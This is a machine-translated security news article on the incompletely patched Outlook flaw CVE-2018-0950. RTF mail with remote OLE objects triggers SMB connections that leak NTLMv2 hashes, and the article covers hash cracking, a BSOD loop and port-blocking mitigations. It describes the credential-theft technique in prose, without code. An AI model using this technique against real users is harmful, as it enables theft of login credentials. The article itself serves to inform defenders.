Stealing of hash password to Windows and incomplete patching in Microsoft Outlook
Apparently, Microsoft believes that it did everything it needed to secure the most popular email client in the world, the Microsoft Outlook application. Reported 18 months ago the gap by Willa Dormanna from the American CERT Coordination Center has only been partially patched. As the expert explains, in the last Patch Tuesday update (Microsoft's second Tuesday of each month) Microsoft has not completely eliminated the problem that is related to vulnerability with the ID
Initially, it was a very serious error in Microsoft Outlook. Exploit of the vulnerability revealed Windows login credentials when the victim received an RTF e-mail message containing OLE objects. Thus, it was enough to read the message via the Microsoft Outlook e-mail client - then the SMB connection was automatically initiated to the server controlled by the attacker. No user interaction was required.
The following screen shot shows that the remote image is not loaded. Interaction with the user is required. These are standard security features of MS Outlook that counteract the disclosure of the victim's true IP address and other metadata (this applies to regular TXT or HTML messages).
Will Dormann did the same experiment with the RTF message format and the OLE object that is loaded from the remote SMB / CIFS server:
If the message is in RTF format, the Outlook mail client loads the OLE object without any interaction.
Saved traffic in the WireShark software reveals what you've really managed to get:
Reading messages led to the theft of information about the IP address, domain name, username, hostname, automatic SMB session entry and NTLMv2 authentication password that failed on the GPU of nVidia 960 in 1 second (although it must be admitted that the password "
test_user " is very easy to break).
This is not the only problem associated with
CVE-2018-0950 . The user gets a free BSOD and falls into a loop - Outlook remembers the last open message, so every time you restart the system and attempt to open the e-mail client, the system hangs again.
The vulnerability update
CVE-2018-0950 released by Microsoft no longer allows automatic loading of OLE content from a remote server, but the attacker may still be bypassed by a social engineering attack that already requires a click on the URL to start connecting to the foreign SMB.
In the prepared guide it is recommended to block connections for
445/tcp, 137/tcp, 139/tcp, 137/udp i 139/udp , implement shared updates, disable NTLM Single Sign-on (SSO) and use complex passwords.
Add new comment
Learn more about our offer
We use Google Cloud Translation and Gengo API’s to translate articles with exception of our comparative tests.